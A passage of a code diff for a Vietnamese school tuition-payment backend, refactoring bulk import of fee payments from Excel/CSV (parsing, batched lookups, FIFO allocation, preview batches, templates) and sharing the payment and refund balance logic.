+# (key có dấu sẽ không bao giờ khớp).
 METHOD_MAP = {
-    "tiền mặt": "cash", "tien mat": "cash", "tm": "cash", "cash": "cash",
-    "chuyển khoản": "bank_transfer", "chuyen khoan": "bank_transfer",
-    "ck": "bank_transfer", "bank_transfer": "bank_transfer",
+    "tien mat": "cash",
+    "tm": "cash",
+    "cash": "cash",
+    "chuyen khoan": "bank_transfer",
+    "ck": "bank_transfer",
+    "bank_transfer": "bank_transfer",
 }
 
 CCCD_RE = re.compile(r"^\d{12}$")
@@ -68,6 +93,7 @@ MAX_IMPORT_ROWS = 5000
 @dataclass
 class RowDraft:
     """Một dòng file đã parse (chưa resolve)."""
+
     row_no: int
     citizen_id: str
     name: str
@@ -83,6 +109,7 @@ class RowDraft:
 @dataclass
 class Allocation:
     """Một phần phân bổ vào 1 invoice (đợt)."""
+
     invoice_id: int
     installment_no: int
     amount: Decimal
@@ -91,7 +118,7 @@ class Allocation:
 @dataclass
 class RowResult:
     row_no: int
-    status: str                       # matched | warned | error
+    status: str  # matched | warned | error
     message: Optional[str] = None
     citizen_id: Optional[str] = None
     profile_id: Optional[int] = None
@@ -134,32 +161,52 @@ def parse_amount_vn(raw: str) -> Decimal:
     string từ Excel, nhóm cuối 1 chữ số) -> 7200000. Heuristic: '.' với nhóm cuối
     đúng 3 chữ số = phân cách nghìn; nếu không -> thập phân.
     """
-    s = _norm(raw).replace(" ", "").replace(" ", "")
+    # Bỏ MỌI khoảng trắng kể cả NBSP   / narrow   — file ngân hàng/Excel
+    # hay ghi '7 200 000' với non-breaking space (re \s khớp Unicode whitespace).
+    s = re.sub(r"\s", "", _norm(raw))
     if not s:
         raise ValueError("trống")
-    if "," in s:                                  # ',' = thập phân VN
+    if "," in s:  # ',' = thập phân VN
         s = s.replace(".", "").replace(",", ".")
-    elif "." in s:                                # '.' nhập nhằng
-        if len(s.rsplit(".", 1)[1]) == 3:         # nhóm cuối 3 chữ số -> nghìn
+    elif "." in s:  # '.' nhập nhằng
+        if len(s.rsplit(".", 1)[1]) == 3:  # nhóm cuối 3 chữ số -> nghìn
             s = s.replace(".", "")
         # else: '.' là thập phân (float string) -> giữ nguyên
     try:
         val = Decimal(s)
     except InvalidOperation:
         raise ValueError(f"số tiền không hợp lệ: '{raw}'")
+    # Cột Numeric(15,2) → chuẩn hóa về 2 chữ số thập phân (VND thực tế là số nguyên).
+    # Tránh '…,505' (3 chữ số thập phân) lọt xuống BV-3 → lỗi/làm tròn ngầm khi INSERT.
+    val = val.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
     if val <= 0:
         raise ValueError("số tiền phải > 0")
     return val
 
 
 def parse_date_vn(raw: str) -> date:
-    """dd/mm/yyyy (hoặc dd-mm-yyyy)."""
+    """Parse ngày thu. Chấp nhận:
+    - text VN: ``dd/mm/yyyy`` / ``dd-mm-yyyy``
+    - ISO: ``yyyy-mm-dd``
+    - chuỗi datetime của Excel khi đọc ``dtype=str``: ``2026-09-05 00:00:00``
+      (openpyxl trả ô Date thật → pandas str-hóa kèm giờ). Kế toán rất hay để
+      Excel tự định dạng ô ngày → PHẢI cắt phần giờ, nếu không HÀNG LOẠT dòng
+      bị false-error "ngày không hợp lệ".
+    """
     s = _norm(raw)
+    if not s:
+        raise ValueError("thiếu ngày thu")
+    s = re.split(r"[ T]", s, maxsplit=1)[0]  # bỏ phần giờ '... 00:00:00' / '...T...'
     for fmt in ("%d/%m/%Y", "%d-%m-%Y", "%Y-%m-%d"):
         try:
-            return datetime.strptime(s, fmt).date()
+            d = datetime.strptime(s, fmt).date()
         except ValueError:
             continue
+        # strptime %Y nuốt năm 1–4 chữ số: '05/09/26' → năm 0026 âm thầm. BV-2 KHÔNG
+        # lộ (row không có cột ngày → vẫn MATCHED) nhưng BV-3 ghi Payment năm 0026.
+        if not (2000 <= d.year <= 2100):
+            raise ValueError(f"năm phải đủ 4 chữ số (2000–2100): '{raw}'")
+        return d
     raise ValueError(f"ngày không hợp lệ (cần dd/mm/yyyy): '{raw}'")
 
 
@@ -190,16 +237,24 @@ def parse_template(content: bytes, filename: str) -> List[RowDraft]:
 
     if len(df) > MAX_IMPORT_ROWS:
         raise BadRequest(
-            f"File {len(df)} dòng vượt giới hạn {MAX_IMPORT_ROWS} dòng/lần import.")
+            f"File {len(df)} dòng vượt giới hạn {MAX_IMPORT_ROWS} dòng/lần import."
+        )
 
     drafts: List[RowDraft] = []
     for i, row in df.iterrows():
-        row_no = int(i) + 1
+        # row_no = SỐ DÒNG trên bảng tính kế toán nhìn thấy: header = dòng 1, nên
+        # dòng dữ liệu đầu (index 0) = dòng 2 → báo lỗi khớp đúng vị trí trong Excel.
+        row_no = int(i) + 2
+        cells = {c: _norm(str(row.get(c, ""))) for c in df.columns}
+        # Bỏ qua dòng TRỐNG HOÀN TOÀN (Excel hay để dòng trống ở cuối) → tránh
+        # false-error "thiếu CCCD" hàng loạt.
+        if not any(cells.values()):
+            continue
         raw = {c: sanitize_csv_cell(row.get(c, "")) for c in df.columns}
-        cccd = _norm(str(row.get(COL_CCCD, "")))
-        name = _norm(str(row.get(COL_NAME, "")))
-        ref = _norm(str(row.get(COL_REF, "")))
-        note = _norm(str(row.get(COL_NOTE, "")))
+        cccd = cells.get(COL_CCCD, "")
+        name = cells.get(COL_NAME, "")
+        ref = cells.get(COL_REF, "")
+        note = cells.get(COL_NOTE, "")
 
         err = None
         amount = None
@@ -217,11 +272,20 @@ def parse_template(content: bytes, filename: str) -> List[RowDraft]:
         if method_code is None:
             err = err or f"hình thức không hợp lệ: '{row.get(COL_METHOD, '')}'"
 
-        drafts.append(RowDraft(
-            row_no=row_no, citizen_id=cccd, name=name, amount=amount,
-            payment_date=pay_date, method_code=method_code, reference=ref,
-            note=note, raw=raw, parse_error=err,
-        ))
+        drafts.append(
+            RowDraft(
+                row_no=row_no,
+                citizen_id=cccd,
+                name=name,
+                amount=amount,
+                payment_date=pay_date,
+                method_code=method_code,
+                reference=ref,
+                note=note,
+                raw=raw,
+                parse_error=err,
+            )
+        )
     return drafts
 
 
@@ -237,21 +301,38 @@ async def resolve_and_validate(
 ) -> PreviewResult:
     """Đối chiếu từng dòng → MATCHED/WARNING/ERROR. KHÔNG ghi gì.
 
-    - khóa = CCCD + academic_year (unique) + IDOR unit-scope
+    - khóa = CCCD + academic_year (unique) + IDOR unit-scope + bỏ lead xóa mềm
     - fee tuition kỳ S, status NOT IN (cancelled, waived)
     - FIFO principal-first: principal_remaining = invoice.amount - paid (KHÔNG
       remaining_amount vì gồm penalty)
     - sổ phân bổ in-batch per-invoice → chống double-alloc khi 2 dòng cùng CCCD+kỳ
     """
+    # --- Prefetch theo lô: 3 query thay vì 3N (tránh N+1 giữ 1 connection lâu +
+    # cạn pool; dedup CCCD trùng miễn phí). (citizen_id, năm) & (profile, tuition,
+    # kỳ) đều UNIQUE nên map 1-1 an toàn. ---
+    cccds = {
+        d.citizen_id
+        for d in drafts
+        if not d.parse_error and CCCD_RE.match(d.citizen_id or "")
+    }
+    profiles = await _fetch_profiles(db, cccds, academic_year, unit_id)
+    fees = await _fetch_tuition_fees(db, [p.id for p in profiles.values()], semester_no)
+    invoices_by_fee = await _fetch_payable_invoices(db, [f.id for f in fees.values()])
+
     # Sổ phân bổ trong batch: invoice_id -> tổng đã phân bổ ở các dòng TRƯỚC.
     batch_alloc: Dict[int, Decimal] = {}
     results: List[RowResult] = []
 
     for d in drafts:
         res = RowResult(
-            row_no=d.row_no, status=PaymentImportRowStatusEnum.error.value,
-            citizen_id=d.citizen_id, amount=d.amount, method_code=d.method_code,
-            payment_date=d.payment_date, reference=d.reference or None, raw=d.raw,
+            row_no=d.row_no,
+            status=PaymentImportRowStatusEnum.error.value,
+            citizen_id=d.citizen_id,
+            amount=d.amount,
+            method_code=d.method_code,
+            payment_date=d.payment_date,
+            reference=d.reference or None,
+            raw=d.raw,
         )
 
         # (0) lỗi parse
@@ -261,40 +342,42 @@ async def resolve_and_validate(
             continue
         # (6) CCCD định dạng
         if not CCCD_RE.match(d.citizen_id):
-            res.message = (
-                "CCCD phải đúng 12 chữ số" if d.citizen_id
-                else "thiếu CCCD")
+            res.message = "CCCD phải đúng 12 chữ số" if d.citizen_id else "thiếu CCCD"
             results.append(res)
             continue
 
-        # (2/6) hồ sơ theo CCCD + năm + IDOR unit-scope
-        profile = await _resolve_profile(db, d.citizen_id, academic_year, unit_id)
+        # (2/6) hồ sơ theo CCCD + năm + IDOR unit-scope (bỏ lead xóa mềm) — prefetch
+        profile = profiles.get(d.citizen_id)
         if profile is None:
-            res.message = f"không tìm thấy hồ sơ CCCD {d.citizen_id} (năm {academic_year})"
+            res.message = (
+                f"không tìm thấy hồ sơ CCCD {d.citizen_id} (năm {academic_year})"
+            )
             results.append(res)
             continue
         res.profile_id = profile.id
 
-        # (3) học phí kỳ S, active-only
-        fee = await _resolve_tuition_fee(db, profile.id, semester_no, unit_id)
+        # (3) học phí kỳ S, active-only — prefetch
+        fee = fees.get(profile.id)
         if fee is None:
             res.message = f"không có học phí HK{semester_no} đang hiệu lực"
             results.append(res)
             continue
         res.fee_id = fee.id
 
-        # (4/5) phân bổ FIFO principal-first, trừ sổ in-batch
+        # (4/5) phân bổ FIFO principal-first, trừ sổ in-batch — prefetch
         warnings: List[str] = []
-        invoices = await _payable_invoices(db, fee.id, unit_id)
+        invoices = invoices_by_fee.get(fee.id, [])
         if not invoices:
             res.message = "chưa phát hành hóa đơn (đợt còn nháp) hoặc đã thu đủ"
             results.append(res)
             continue
 
         remaining_total = Decimal("0")
-        avail: List[tuple] = []  # (invoice, available_principal)
+        avail: List[Tuple[Invoice, Decimal]] = []  # (invoice, available_principal)
         for inv in invoices:
-            principal_rem = (inv.amount or Decimal("0")) - (inv.paid_amount or Decimal("0"))
+            principal_rem = (inv.amount or Decimal("0")) - (
+                inv.paid_amount or Decimal("0")
+            )
             principal_rem -= batch_alloc.get(inv.id, Decimal("0"))
             if principal_rem < 0:
                 principal_rem = Decimal("0")
@@ -304,15 +387,19 @@ async def resolve_and_validate(
         if d.amount > remaining_total:
             res.message = (
                 f"thu {_money(d.amount)} vượt tổng còn nợ gốc HK{semester_no} "
-                f"({_money(remaining_total)})")
+                f"({_money(remaining_total)})"
+            )
             results.append(res)
             continue
 
         # cross-check tên (warning)
-        if d.name and _norm_name(d.name) != _norm_name(profile.lead.full_name if profile.lead else ""):
+        if d.name and _norm_name(d.name) != _norm_name(
+            profile.lead.full_name if profile.lead else ""
+        ):
             warnings.append(
                 f"tên lệch: file '{d.name}' vs hồ sơ "
-                f"'{profile.lead.full_name if profile.lead else ''}'")
+                f"'{profile.lead.full_name if profile.lead else ''}'"
+            )
 
         # FIFO allocate
         left = d.amount
@@ -323,7 +410,10 @@ async def resolve_and_validate(
                 continue
             take = min(left, principal_rem)
             res.allocations.append(
-                Allocation(invoice_id=inv.id, installment_no=inv.installment_no, amount=take))
+                Allocation(
+                    invoice_id=inv.id, installment_no=inv.installment_no, amount=take
+                )
+            )
             batch_alloc[inv.id] = batch_alloc.get(inv.id, Decimal("0")) + take
             left -= take
 
@@ -337,67 +427,306 @@ async def resolve_and_validate(
             res.status = PaymentImportRowStatusEnum.matched.value
         results.append(res)
 
-    matched = sum(1 for r in results if r.status == PaymentImportRowStatusEnum.matched.value)
-    warned = sum(1 for r in results if r.status == PaymentImportRowStatusEnum.warned.value)
-    failed = sum(1 for r in results if r.status == PaymentImportRowStatusEnum.error.value)
+    matched = sum(
+        1 for r in results if r.status == PaymentImportRowStatusEnum.matched.value
+    )
+    warned = sum(
+        1 for r in results if r.status == PaymentImportRowStatusEnum.warned.value
+    )
+    failed = sum(
+        1 for r in results if r.status == PaymentImportRowStatusEnum.error.value
+    )
     total = sum(
-        (r.amount or Decimal("0")) for r in results
-        if r.status != PaymentImportRowStatusEnum.error.value)
+        (r.amount or Decimal("0"))
+        for r in results
+        if r.status != PaymentImportRowStatusEnum.error.value
+    )
     return PreviewResult(
-        rows=results, matched_count=matched, warned_count=warned,
-        failed_count=failed, total_amount=total)
+        rows=results,
+        matched_count=matched,
+        warned_count=warned,
+        failed_count=failed,
+        total_amount=total,
+    )
 
 
-async def _resolve_profile(
-    db: AsyncSession, citizen_id: str, academic_year: int, unit_id: Optional[int],
-) -> Optional[models.AdmissionProfile]:
-    """CCCD + năm → hồ sơ (unique), IDOR unit-scope, eager lead cho cross-check tên."""
+async def _fetch_profiles(
+    db: AsyncSession,
+    citizen_ids: set,
+    academic_year: int,
+    unit_id: Optional[int],
+) -> Dict[str, models.AdmissionProfile]:
+    """Lô CCCD → {citizen_id: hồ sơ} trong 1 query (thay N). IDOR unit-scope, bỏ
+    lead xóa mềm, eager lead cho cross-check tên. (citizen_id, academic_year) UNIQUE
+    → mỗi CCCD tối đa 1 hồ sơ/năm nên map 1-1 an toàn.
+
+    Lọc ``Lead.deleted_at IS NULL`` — nếu không, hồ sơ của lead đã xóa mềm vẫn khớp
+    CCCD → false MATCH → BV-3 ghi tiền vào hồ sơ "ma".
+    """
     from sqlalchemy.orm import selectinload
+
+    if not citizen_ids:
+        return {}
     stmt = (
         select(models.AdmissionProfile)
         .join(models.Lead)
         .options(selectinload(models.AdmissionProfile.lead))
         .where(
-            models.AdmissionProfile.citizen_id == citizen_id,
+            models.AdmissionProfile.citizen_id.in_(list(citizen_ids)),
             models.AdmissionProfile.academic_year == academic_year,
+            models.Lead.deleted_at.is_(None),
         )
     )
     if unit_id is not None:
         stmt = stmt.where(models.Lead.unit_id == unit_id)
-    return (await db.execute(stmt)).scalar_one_or_none()
+    rows = (await db.execute(stmt)).scalars().all()
+    return {p.citizen_id: p for p in rows}
 
 
-async def _resolve_tuition_fee(
-    db: AsyncSession, profile_id: int, semester_no: int, unit_id: Optional[int],
-) -> Optional[Fee]:
-    """Học phí (tuition) kỳ S, status active (NOT cancelled/waived)."""
-    stmt = (
-        select(Fee)
-        .where(
-            Fee.admission_profile_id == profile_id,
-            Fee.fee_type == "tuition",
-            Fee.semester_no == semester_no,
-            Fee.status.notin_(
-                [FeeStatusEnum.cancelled.value, FeeStatusEnum.waived.value]),
-        )
+async def _fetch_tuition_fees(
+    db: AsyncSession,
+    profile_ids: List[int],
+    semester_no: int,
+) -> Dict[int, Fee]:
+    """Lô profile_id → {profile_id: fee} (tuition kỳ S, active-only) trong 1 query.
+    (profile, fee_type=tuition, semester_no) UNIQUE → mỗi profile tối đa 1 fee kỳ S.
+
+    Không cần lọc unit: hồ sơ đã resolve dưới unit-scope nên fee đã trong phạm vi.
+    """
+    if not profile_ids:
+        return {}
+    stmt = select(Fee).where(
+        Fee.admission_profile_id.in_(profile_ids),
+        Fee.fee_type == "tuition",
+        Fee.semester_no == semester_no,
+        Fee.status.notin_([FeeStatusEnum.cancelled.value, FeeStatusEnum.waived.value]),
     )
-    return (await db.execute(stmt)).scalars().first()
+    rows = (await db.execute(stmt)).scalars().all()
+    return {f.admission_profile_id: f for f in rows}
 
 
-async def _payable_invoices(
-    db: AsyncSession, fee_id: int, unit_id: Optional[int],
-) -> List[Invoice]:
-    """Đợt PAYABLE (issued/partial/overdue) sắp theo installment_no."""
+async def _fetch_payable_invoices(
+    db: AsyncSession,
+    fee_ids: List[int],
+) -> Dict[int, List[Invoice]]:
+    """Lô fee_id → {fee_id: [invoice PAYABLE]} sắp installment_no, trong 1 query."""
+    if not fee_ids:
+        return {}
     stmt = (
         select(Invoice)
         .where(
-            Invoice.fee_id == fee_id,
+            Invoice.fee_id.in_(fee_ids),
             Invoice.status.in_(list(PAYABLE_INVOICE_STATUSES)),
         )
-        .order_by(Invoice.installment_no)
+        .order_by(Invoice.fee_id, Invoice.installment_no)
     )
-    return list((await db.execute(stmt)).scalars().all())
+    by_fee: Dict[int, List[Invoice]] = {}
+    for inv in (await db.execute(stmt)).scalars().all():
+        by_fee.setdefault(inv.fee_id, []).append(inv)
+    return by_fee
 
 
 def _money(v: Decimal) -> str:
     return f"{v:,.0f}".replace(",", ".")
+
+
+# ---------------------------------------------------------------------------
+# Persist preview batch + orchestrator (BV-2)
+# ---------------------------------------------------------------------------
+async def preview_import(
+    db: AsyncSession,
+    *,
+    content: bytes,
+    filename: str,
+    academic_year: int,
+    semester_no: int,
+    created_by_id: int,
+    unit_id: Optional[int],
+) -> Tuple[PaymentImportBatch, PreviewResult]:
+    """Pha 1 (dry-run): parse → resolve/validate READ-ONLY → lưu batch 'preview'.
+
+    KHÔNG ghi Payment. Trả ``(batch, preview)`` để router build response giàu thông
+    tin (kèm phân bổ FIFO dự kiến — chỉ in-memory, KHÔNG persist vào row).
+    """
+    drafts = parse_template(content, filename)
+    preview = await resolve_and_validate(
+        db, drafts, academic_year, semester_no, unit_id
+    )
+    batch = await create_preview_batch(
+        db,
+        preview=preview,
+        academic_year=academic_year,
+        semester_no=semester_no,
+        file_name=filename,
+        file_sha256_hex=file_sha256(content),
+        created_by_id=created_by_id,
+    )
+    return batch, preview
+
+
+async def create_preview_batch(
+    db: AsyncSession,
+    *,
+    preview: PreviewResult,
+    academic_year: int,
+    semester_no: int,
+    file_name: str,
+    file_sha256_hex: str,
+    created_by_id: int,
+) -> PaymentImportBatch:
+    """Lưu kết quả preview thành 1 ``PaymentImportBatch`` 'preview' + các
+    ``PaymentImportRow`` (audit + để pha commit tham chiếu ``batch_id``).
+
+    Tôn trọng partial-unique ``uq_payment_import_batch_active_file`` (tối đa 1 batch
+    còn-hiệu-lực / file):
+    - cùng sha256 đã ``committed`` → ``ConflictError`` (chống double-count; phải đảo
+      (void) lô đó trước khi import lại).
+    - ``preview`` cũ cùng sha256 → xóa & tạo lại (DB có thể đã đổi giữa 2 lần xem).
+    """
+    existing = (
+        await db.execute(
+            select(PaymentImportBatch).where(
+                PaymentImportBatch.file_sha256 == file_sha256_hex,
+                PaymentImportBatch.status != PaymentImportBatchStatusEnum.void.value,
+            )
+        )
+    ).scalar_one_or_none()
+    if existing is not None:
+        if existing.status == PaymentImportBatchStatusEnum.committed.value:
+            ngay = (
+                f" ngày {existing.committed_at:%d/%m/%Y}"
+                if existing.committed_at
+                else ""
+            )
+            raise ConflictError(
+                f"File này đã được import và ghi nhận ở lô #{existing.id}{ngay}. "
+                "Hãy đảo (void) lô đó trước nếu muốn import lại."
+            )
+        # preview cũ cùng file → thay thế (cascade xóa rows) rồi tạo lại
+        await db.delete(existing)
+        await db.flush()
+
+    batch = PaymentImportBatch(
+        academic_year=academic_year,
+        semester_no=semester_no,
+        file_name=(file_name or "")[:255],
+        file_sha256=file_sha256_hex,
+        row_count=len(preview.rows),
+        matched_count=preview.matched_count,
+        warned_count=preview.warned_count,
+        failed_count=preview.failed_count,
+        total_amount=preview.total_amount,
+        status=PaymentImportBatchStatusEnum.preview.value,
+        created_by_id=created_by_id,
+    )
+    db.add(batch)
+    try:
+        await db.flush()
+    except IntegrityError as exc:
+        # Race: 2 upload cùng file đồng thời lọt qua pre-check → partial-unique chặn.
+        await db.rollback()
+        raise ConflictError(
+            "File đang được xử lý bởi một thao tác khác. Vui lòng thử lại."
+        ) from exc
+
+    for r in preview.rows:
+        # citizen_id cột String(12): chỉ lưu khi đúng 12 số, ngược lại None (CMND 9
+        # số / rác dài hơn sẽ tràn cột) — giá trị gốc vẫn nằm trong ``raw`` để đối soát.
+        cid = r.citizen_id if (r.citizen_id and CCCD_RE.match(r.citizen_id)) else None
+        db.add(
+            PaymentImportRow(
+                batch_id=batch.id,
+                row_no=r.row_no,
+                citizen_id=cid,
+                raw=r.raw or {},
+                resolved_profile_id=r.profile_id,
+                resolved_fee_id=r.fee_id,
+                status=r.status,
+                message=r.message,
+                amount=r.amount,
+                payment_ids=None,
+            )
+        )
+    await db.flush()
+    return batch
+
+
+# ---------------------------------------------------------------------------
+# Template generation (BV-2) — ở SERVICE để router chỉ stream bytes (CLAUDE.md:
+# "Router: Input/Output ONLY") + test được generator.
+# ---------------------------------------------------------------------------
+_TEMPLATE_EXAMPLE = [
+    "001234567890",  # Số CCCD (text, giữ số 0 đầu)
+    "Nguyễn Văn An",  # Họ và tên học sinh
+    "7.200.000",  # Số tiền thu (VNĐ) — GỐC học phí
+    "05/09/2026",  # Ngày thu dd/mm/yyyy
+    "TM",  # Hình thức: TM=tiền mặt / CK=chuyển khoản
+    "PT-2026-0001",  # Mã tham chiếu (tùy chọn)
+    "Thu học phí HK1",  # Ghi chú (tùy chọn)
+]
+_TEMPLATE_DESCRIPTIONS = [
+    "Số CCCD 12 chữ số — ĐỊNH DẠNG TEXT (giữ số 0 đầu). Bắt buộc.",
+    "Họ và tên học sinh (để đối chiếu — lệch chỉ cảnh báo).",
+    "Số tiền đã thu (VNĐ), GỐC học phí. VD: 7.200.000. Bắt buộc.",
+    "Ngày thu, định dạng dd/mm/yyyy. Bắt buộc.",
+    "Hình thức: TM = tiền mặt, CK = chuyển khoản. Bắt buộc.",
+    "Mã tham chiếu phiếu thu/UNC (tùy chọn) — định dạng TEXT.",
+    "Ghi chú (tùy chọn).",
+]
+_XLSX_MEDIA = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
+
+
+def build_template(fmt: str) -> Tuple[bytes, str, str]:
+    """Sinh file mẫu import → ``(content, media_type, filename)``.
+
+    - CSV: prepend BOM (``\\ufeff``) → Excel locale VN không đọc mojibake header
+      tiếng Việt (không BOM → ANSI → kế toán điền & upload lại → lệch cột → lỗi).
+    - XLSX: cột CCCD + Mã tham chiếu ``number_format='@'`` (TEXT) tới HẾT vùng nhập
+      (``MAX_IMPORT_ROWS``) — không chỉ vài dòng đầu, nếu không file > N dòng sẽ mất
+      số 0 đầu CCCD từ vùng chưa định dạng → khớp nhầm người.
+    """
+    if (fmt or "").lower() == "csv":
+        buf = io.StringIO()
+        writer = csv.writer(buf)
+        writer.writerow(TEMPLATE_COLS)
+        writer.writerow(_TEMPLATE_EXAMPLE)
+        # BOM (utf-8-sig) để Excel locale VN không đọc mojibake header tiếng Việt.
+        content = ("﻿" + buf.getvalue()).encode("utf-8")
+        return content, "text/csv; charset=utf-8", "mau_import_thu_hoc_phi.csv"
+
+    from openpyxl import Workbook
+    from openpyxl.comments import Comment
+    from openpyxl.styles import Alignment, Font, PatternFill
+
+    wb = Workbook()
+    ws = wb.active
+    ws.title = "Thu hoc phi"
+    ws.append(TEMPLATE_COLS)
+
+    header_fill = PatternFill(
+        start_color="2F5496", end_color="2F5496", fill_type="solid"
+    )
+    header_font = Font(color="FFFFFF", bold=True)
+    for idx, cell in enumerate(ws[1]):
+        cell.fill = header_fill
+        cell.font = header_font
+        cell.alignment = Alignment(horizontal="center", vertical="center")
+        cell.comment = Comment(_TEMPLATE_DESCRIPTIONS[idx], "QLTS")
+
+    ws.append(_TEMPLATE_EXAMPLE)
+
+    # number_format='@' (TEXT) cho cột CCCD + Mã tham chiếu tới HẾT vùng nhập.
+    cccd_col = TEMPLATE_COLS.index(COL_CCCD) + 1
+    ref_col = TEMPLATE_COLS.index(COL_REF) + 1
+    for col_idx in (cccd_col, ref_col):
+        letter = ws.cell(row=1, column=col_idx).column_letter
+        for r in range(2, MAX_IMPORT_ROWS + 2):
+            ws[f"{letter}{r}"].number_format = "@"
+
+    widths = [16, 22, 18, 14, 12, 18, 24]
+    for i, w in enumerate(widths):
+        ws.column_dimensions[ws.cell(row=1, column=i + 1).column_letter].width = w
+
+    out = io.BytesIO()
+    wb.save(out)
+    return out.getvalue(), _XLSX_MEDIA, "mau_import_thu_hoc_phi.xlsx"

--- a/Backend_FastAPI/app/services/payment_service.py
+++ b/Backend_FastAPI/app/services/payment_service.py
@@ -54,6 +54,44 @@ from app.config import settings
 log = structlog.get_logger(__name__)
 
 
+def apply_verified_payment_balances(
+    *,
+    invoice: Invoice,
+    fee: Fee,
+    amount: Decimal,
+    now: datetime,
+) -> Tuple[Decimal, Decimal]:
+    """Áp money-math của 1 payment ĐÃ verified vào invoice + fee (cập nhật
+    paid_amount/status + bump fee.version). Trả ``(fee_balance_before, fee_remaining)``
+    cho audit transaction.
+
+    NGUỒN SỰ THẬT DUY NHẤT cho việc "ghi 1 khoản verified vào invoice+fee", dùng
+    chung bởi ``verify_payment`` (verify tay) và ``payment_import_service.
+    auto_verify_payment`` (bulk import) — tránh 2 đường ghi tiền trôi dạt số liệu.
+
+    Lưu ý: ``invoice.is_fully_paid`` GỒM penalty → trả đủ GỐC nhưng còn phạt thì
+    invoice giữ 'partial'. fee chỉ lên 'partial' từ 'invoiced' (giữ nguyên các status
+    khác như verify_payment lịch sử).
+    """
+    invoice.paid_amount = (invoice.paid_amount or Decimal("0")) + amount
+    if invoice.is_fully_paid:
+        invoice.status = InvoiceStatusEnum.paid.value
+        invoice.paid_at = now
+    elif invoice.paid_amount > 0:
+        invoice.status = InvoiceStatusEnum.partial.value
+
+    fee_balance_before = fee.final_amount - fee.paid_amount - fee.waived_amount
+    fee.paid_amount = fee.paid_amount + amount
+    fee.last_payment_at = now
+    fee.version += 1
+    fee_remaining = fee.final_amount - fee.paid_amount - fee.waived_amount
+    if fee_remaining <= 0:
+        fee.status = FeeStatusEnum.paid.value
+    elif fee.paid_amount > 0 and fee.status == FeeStatusEnum.invoiced.value:
+        fee.status = FeeStatusEnum.partial.value
+    return fee_balance_before, fee_remaining
+
+
 class PaymentService:
     """
     Service for manual payment processing with maker-checker workflow.
@@ -286,37 +324,23 @@ class PaymentService:
         if not fee:
             raise ResourceNotFoundError("Fee not found")
 
-        # Capture balance + cleared state BEFORE mutation (PR 5 transition detection)
-        fee_balance_before = fee.final_amount - fee.paid_amount - fee.waived_amount
+        # Capture cleared state BEFORE mutation (PR 5 transition detection)
         from app.services.fee_calculation_service import is_hk1_cleared
         was_hk1_cleared = is_hk1_cleared(
             fee.fee_type, fee.semester_no, fee.status, fee.paid_amount
         )
 
         # Update payment status
+        now = datetime.now(timezone.utc)
         payment.status = PaymentStatusEnum.verified.value
-        payment.verified_at = datetime.now(timezone.utc)
+        payment.verified_at = now
         payment.verified_by_id = verifier_id
 
-        # Update invoice paid_amount
-        invoice.paid_amount = invoice.paid_amount + payment.amount
-        if invoice.is_fully_paid:
-            invoice.status = InvoiceStatusEnum.paid.value
-            invoice.paid_at = datetime.now(timezone.utc)
-        elif invoice.paid_amount > 0:
-            invoice.status = InvoiceStatusEnum.partial.value
-
-        # Update fee paid_amount
-        fee.paid_amount = fee.paid_amount + payment.amount
-        fee.last_payment_at = datetime.now(timezone.utc)
-        fee.version += 1
-
-        # Update fee status
-        fee_remaining = fee.final_amount - fee.paid_amount - fee.waived_amount
-        if fee_remaining <= 0:
-            fee.status = FeeStatusEnum.paid.value
-        elif fee.paid_amount > 0 and fee.status == FeeStatusEnum.invoiced.value:
-            fee.status = FeeStatusEnum.partial.value
+        # Apply money-math to invoice + fee (shared 1 nguồn sự thật với bulk
+        # auto-verify) → fee_balance_before / fee_remaining cho audit transaction.
+        fee_balance_before, fee_remaining = apply_verified_payment_balances(
+            invoice=invoice, fee=fee, amount=payment.amount, now=now
+        )
 
         # Create audit transaction
         transaction = PaymentTransaction(

--- a/Backend_FastAPI/app/services/payment_service.py
+++ b/Backend_FastAPI/app/services/payment_service.py
@@ -92,6 +92,44 @@ def apply_verified_payment_balances(
     return fee_balance_before, fee_remaining
 
 
+def reverse_payment_balances(
+    *,
+    invoice: Invoice,
+    fee: Fee,
+    amount: Decimal,
+) -> Tuple[Decimal, Decimal]:
+    """NGHỊCH ĐẢO ``apply_verified_payment_balances``: rút ``amount`` đã ghi khỏi
+    invoice + fee (đảo/void 1 payment verified). Trả ``(fee_balance_before,
+    fee_remaining)`` cho audit transaction.
+
+    1 NGUỒN SỰ THẬT cho việc RÚT tiền: dùng chung bởi ``process_approved_refund``
+    (hoàn lẻ) và void lô import bulk. paid về 0 → invoice 'issued' + paid_at=None (mở
+    lại để thu tiếp), một phần → 'partial'; fee recompute status + bump version.
+    """
+    fee_balance_before = fee.final_amount - fee.paid_amount - fee.waived_amount
+    invoice.paid_amount = (invoice.paid_amount or Decimal("0")) - amount
+    if invoice.paid_amount <= 0:
+        invoice.paid_amount = Decimal("0")
+        invoice.status = InvoiceStatusEnum.issued.value
+        invoice.paid_at = None
+    elif invoice.paid_amount < invoice.amount:
+        invoice.status = InvoiceStatusEnum.partial.value
+        invoice.paid_at = None
+
+    fee.paid_amount = fee.paid_amount - amount
+    if fee.paid_amount < Decimal("0"):
+        fee.paid_amount = Decimal("0")
+    fee.version += 1
+    fee_remaining = fee.final_amount - fee.paid_amount - fee.waived_amount
+    if fee_remaining <= 0:
+        fee.status = FeeStatusEnum.paid.value
+    elif fee.paid_amount > 0:
+        fee.status = FeeStatusEnum.partial.value
+    else:
+        fee.status = FeeStatusEnum.invoiced.value
+    return fee_balance_before, fee_remaining
+
+
 class PaymentService:
     """
     Service for manual payment processing with maker-checker workflow.
@@ -932,39 +970,31 @@ class RefundService:
         if not fee:
             raise ResourceNotFoundError("Fee not found")
 
-        # Capture balance before
-        fee_balance_before = fee.final_amount - fee.paid_amount - fee.waived_amount
+        # P1 (BV-3.5): re-check payment.status SAU khóa fee (void lô import khóa CÙNG
+        # fee → serialize) + refresh (payment eager-load qua refund_repo joinedload có
+        # thể STALE so với void vừa commit). Chặn hoàn payment đã bị ĐẢO (→'refunded')
+        # → tránh trừ tiền 2 LẦN. KHÔNG lock payment ở đây (void khóa payment→fee; nếu
+        # process khóa fee rồi payment sẽ ABBA-deadlock với void).
+        await self.db.refresh(payment)
+        if payment.status != PaymentStatusEnum.verified.value:
+            raise BusinessRuleViolation(
+                f"Chỉ hoàn được payment đã verified (hiện: {payment.status}). "
+                "Payment có thể đã bị đảo qua void lô import."
+            )
 
         # Update refund status
         refund.status = RefundStatusEnum.refunded.value
         refund.refunded_at = datetime.now(timezone.utc)
